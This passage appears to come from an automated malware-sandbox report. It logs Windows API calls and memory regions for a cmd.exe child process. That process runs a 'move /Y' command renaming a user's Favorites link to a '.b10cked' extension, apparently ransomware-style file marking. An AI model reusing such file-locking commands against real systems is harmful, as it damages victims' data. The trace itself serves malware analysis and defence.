SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0211.679] GetEnvironmentStringsW () returned 0x473790* [0211.679] FreeEnvironmentStringsW (penv=0x473790) returned 1 [0211.679] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.679] GetEnvironmentStringsW () returned 0x473790* [0211.679] FreeEnvironmentStringsW (penv=0x473790) returned 1 [0211.679] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af23c | out: lpAttributeList=0x2af23c) [0211.679] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.679] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0211.679] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.679] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0211.679] _get_osfhandle (_FileHandle=0) returned 0x3 [0211.679] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 
1 [0211.679] SetConsoleInputExeNameW () returned 0x1 [0211.679] GetConsoleOutputCP () returned 0x1b5 [0211.679] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0211.679] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.680] exit (_Code=0) Process: id = "513" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0x748" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30979 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30980 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30981 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30982 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 30983 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: 
"c:\\windows\\system32\\cmd.exe") Region: id = 30984 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30985 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30986 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30987 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30988 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31009 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31010 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31011 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31012 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 31013 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 31014 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: 
"c:\\windows\\system32\\winbrand.dll") Region: id = 31015 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31016 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31017 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31018 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31019 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31020 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31021 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31022 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31023 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 31024 start_va = 0x76490000 end_va = 
0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31025 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31026 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31027 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31028 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31029 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 31030 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 31031 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 31032 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 713 os_tid = 0x114 [0210.922] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efb3c | out: lpSystemTimeAsFileTime=0x1efb3c*(dwLowDateTime=0xb288a000, dwHighDateTime=0x1d440a9)) [0210.922] GetCurrentProcessId () returned 0x748 [0210.922] GetCurrentThreadId () returned 0x114 [0210.923] GetTickCount () returned 0x3b347 [0210.923] QueryPerformanceCounter (in: lpPerformanceCount=0x1efb34 | out: lpPerformanceCount=0x1efb34*=26771178314) returned 1 [0210.923] GetModuleHandleA (lpModuleName=0x0) returned 
0x4a9c0000 [0210.924] __set_app_type (_Type=0x1) [0210.924] __p__fmode () returned 0x76b331f4 [0210.924] __p__commode () returned 0x76b331fc [0210.924] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0210.924] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0210.924] GetCurrentThreadId () returned 0x114 [0210.924] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x114) returned 0x38 [0210.924] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0210.924] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0210.924] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.925] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0210.925] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efacc | out: phkResult=0x1efacc*=0x0) returned 0x2 [0210.925] VirtualQuery (in: lpAddress=0x1efb03, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0210.925] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0210.925] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0210.925] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efa9c, dwLength=0x1c | out: 
lpBuffer=0x1efa9c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0210.925] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0210.925] GetConsoleOutputCP () returned 0x1b5 [0210.925] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.925] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0210.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.925] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0210.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.925] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0210.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.926] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.926] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.926] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0210.926] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.926] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0210.926] GetEnvironmentStringsW () returned 0x3801a0* [0210.927] FreeEnvironmentStringsW (penv=0x3801a0) returned 1 [0210.927] GetEnvironmentStringsW () returned 0x3801a0* [0210.927] FreeEnvironmentStringsW (penv=0x3801a0) returned 1 [0210.927] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea3c | out: phkResult=0x1eea3c*=0x40) returned 0x0 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0xc8, 
lpcbData=0x1eea40*=0x1000) returned 0x2 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x1, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x1, lpcbData=0x1eea40*=0x1000) returned 0x2 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x0, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x40, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x40, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x40, lpcbData=0x1eea40*=0x1000) returned 0x2 [0210.927] RegCloseKey (hKey=0x40) returned 0x0 [0210.927] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea3c | out: phkResult=0x1eea3c*=0x40) returned 0x0 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x40, lpcbData=0x1eea40*=0x1000) returned 0x2 [0210.927] RegQueryValueExW (in: 
hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x1, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x1, lpcbData=0x1eea40*=0x1000) returned 0x2 [0210.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x0, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.928] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x9, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.928] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x9, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.928] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x9, lpcbData=0x1eea40*=0x1000) returned 0x2 [0210.928] RegCloseKey (hKey=0x40) returned 0x0 [0210.928] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ac [0210.928] srand (_Seed=0x5b8863ac) [0210.928] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked\"" [0210.928] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked\"" [0210.928] 
GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.928] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x381900, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0210.929] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0210.929] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.929] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0210.929] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0210.929] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0210.929] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0210.929] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0210.929] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0210.929] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0210.929] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0210.929] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0210.929] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0210.929] GetEnvironmentStringsW () returned 0x3822f0* [0210.929] FreeEnvironmentStringsW (penv=0x3822f0) returned 1 [0210.929] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.929] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0210.930] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0210.930] 
_wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0210.930] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0210.930] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0210.930] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0210.930] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0210.930] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0210.930] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0210.930] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef808 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.930] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef808, lpFilePart=0x1ef804 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef804*="Desktop") returned 0x18 [0210.930] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0210.930] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef584 | out: lpFindFileData=0x1ef584) returned 0x380030 [0210.930] FindClose (in: hFindFile=0x380030 | out: hFindFile=0x380030) returned 1 [0210.930] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef584 | out: lpFindFileData=0x1ef584) returned 0x380030 [0210.931] FindClose (in: hFindFile=0x380030 | out: hFindFile=0x380030) returned 1 [0210.931] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef584 | out: lpFindFileData=0x1ef584) returned 0x380030 [0210.931] FindClose (in: hFindFile=0x380030 | out: hFindFile=0x380030) returned 1 [0210.931] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0210.931] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0210.931] SetEnvironmentVariableW (lpName="=C:", 
lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0210.931] GetEnvironmentStringsW () returned 0x382b10* [0210.931] FreeEnvironmentStringsW (penv=0x382b10) returned 1 [0210.931] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.932] GetConsoleOutputCP () returned 0x1b5 [0210.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.932] GetUserDefaultLCID () returned 0x409 [0210.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef948, cchData=128 | out: lpLCData="0") returned 2 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef948, cchData=128 | out: lpLCData="0") returned 2 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef948, cchData=128 | out: lpLCData="1") returned 2 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0210.933] 
GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0210.933] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0210.934] GetConsoleTitleW (in: lpConsoleTitle=0x3708f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.935] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0210.935] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0210.935] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0210.935] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0210.936] _wcsicmp (_String1="move", _String2=")") returned 68 [0210.936] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0210.936] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0210.936] _wcsicmp (_String1="IF", _String2="move") returned -4 [0210.936] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0210.936] _wcsicmp (_String1="REM", _String2="move") returned 5 [0210.936] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0210.939] GetConsoleTitleW (in: lpConsoleTitle=0x1ef640, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.939] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0210.939] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0210.939] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0210.939] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0210.939] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0210.939] _wcsicmp (_String1="move", _String2="CD") returned 10 [0210.939] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0210.939] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0210.939] _wcsicmp 
(_String1="move", _String2="REN") returned -5 [0210.939] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0210.939] _wcsicmp (_String1="move", _String2="SET") returned -6 [0210.939] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0210.939] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0210.939] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0210.940] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0210.940] _wcsicmp (_String1="move", _String2="MD") returned 11 [0210.940] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0210.940] _wcsicmp (_String1="move", _String2="RD") returned -5 [0210.940] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0210.940] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0210.940] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0210.940] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0210.940] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0210.940] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0210.940] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0210.940] _wcsicmp (_String1="move", _String2="VER") returned -9 [0210.940] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0210.940] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0210.940] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0210.940] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0210.940] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0210.940] _wcsicmp (_String1="move", _String2="START") returned -6 [0210.940] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0210.940] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0210.940] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0210.942] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.942] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.942] GetVolumeInformationW (in: lpRootPathName="C:\\", 
